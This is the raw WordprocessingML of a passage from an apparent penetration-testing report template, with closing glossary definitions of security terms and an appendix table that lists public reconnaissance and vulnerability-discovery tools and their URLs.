        <w:t xml:space="preserve"> The potential for damage or harm resulting from a successful attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513283B6" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="004F68CB" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security Audit:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> A thorough checklist of security controls are measured against both technical implementations, policies, and procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F3B72F" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="004F68CB" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> The degree of harm that could result from a successful attack, often measured on a scale from low to critical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C7464A" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="004F68CB" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Social engineering:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using psychological manipulation to trick users into divulging sensitive information or performing actions that could compromise security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E051E9" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="004F68CB" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Threat:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Something that can cause the system harm, either adversarial, environmental, or accidental.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B326FF" w14:textId="47110A8A" w:rsidR="004F68CB" w:rsidRPr="004F68CB" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Threat Event:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> The event that is doing some harm against a target. Adversarial could take the form of recon, creating weapons (exploits), attacking, exfiltrating data, or other malicious actions against a target. Non-adversarial examples might be disk failure, employee negligence, or natural disaster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D57D30C" w14:textId="43EBC5D3" w:rsidR="00A34711" w:rsidRPr="005264D0" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="328D9F" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> A weakness in a business process, configuration, operating system, or application that can be used to create unintended and undesired scenarios or opportunities for threat events.</w:t>
      </w:r>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D89D230" w14:textId="278F04B8" w:rsidR="0061682E" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="005E496E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc129370253"/>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix B: Tools</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="34B4CA48" w14:textId="4DC61AE5" w:rsidR="00A34711" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc129370254"/>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2335"/>
        <w:gridCol w:w="7015"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="0A80666C"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1F7CC08C" w14:textId="6B7167F9" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FF37948" w14:textId="63DDC162" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="4A212761"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E04C29F" w14:textId="26613D55" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>BuiltWith</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07AB1A6B" w14:textId="58A71CC4" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId41" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://builtwith.com/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="5E2CF7D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AE5F79A" w14:textId="4E7DD40C" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Get All URLs (GAU)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6358BBE4" w14:textId="06A76050" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId42" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://github.com/lc/gau</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="5E0E215E"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7E2DB18C" w14:textId="38E60EE8" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>GoWitness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A014703" w14:textId="2B645394" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId43" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://github.com/sensepost/gowitness</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="2FDF1CCC"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5F2306D6" w14:textId="7CC3F79B" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Massscan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DCA2AF7" w14:textId="60053D65" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId44" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://github.com/robertdavidgraham/masscan</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="798151F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1D609A80" w14:textId="45C1C125" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E13D28E" w14:textId="75FA3463" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId45" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://nmap.org/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="1723B79C"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131B23D" w14:textId="77BE5910" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Recon-ng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A8FBBC8" w14:textId="75821986" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId46" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://www.kali.org/tools/recon-ng/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="1E133AA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5A1FE669" w14:textId="03633235" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Shodan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14D72E2D" w14:textId="0F4121F5" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId47" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://www.shodan.io/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="56657D9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62BD1ADD" w14:textId="001E303A" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>TheHarvester</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BBC6B1A" w14:textId="11778EFA" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId48" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://www.kali.org/tools/theharvester/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44029610" w14:textId="3243B99B" w:rsidR="00A34711" w:rsidRPr="005264D0" w:rsidRDefault="00A34711" w:rsidP="00A34711">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B344852" w14:textId="629DCCB4" w:rsidR="00A34711" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc129370255"/>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Vulnerability Discovery</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2335"/>
        <w:gridCol w:w="7015"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="100839C7"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5648882A" w14:textId="77777777" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="379CA8E5" w14:textId="77777777" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="26A0AD0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69D3FF1" w14:textId="4B59162F" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>FFUF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79AAC050" w14:textId="2E9489D3" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId49" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://github.com/ffuf/ffuf</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="6B16E5DB"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D19E796" w14:textId="7A26525B" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Go</w:t>
            </w:r>
            <w:r w:rsidR="008C4B44" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>uster</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65D658BB" w14:textId="05CE6C71" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId50" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://github.com/OJ/gobuster</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="5274C854"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687D0049" w14:textId="52DEF109" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Nikto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E80E8EF" w14:textId="77777777" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00D70417" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
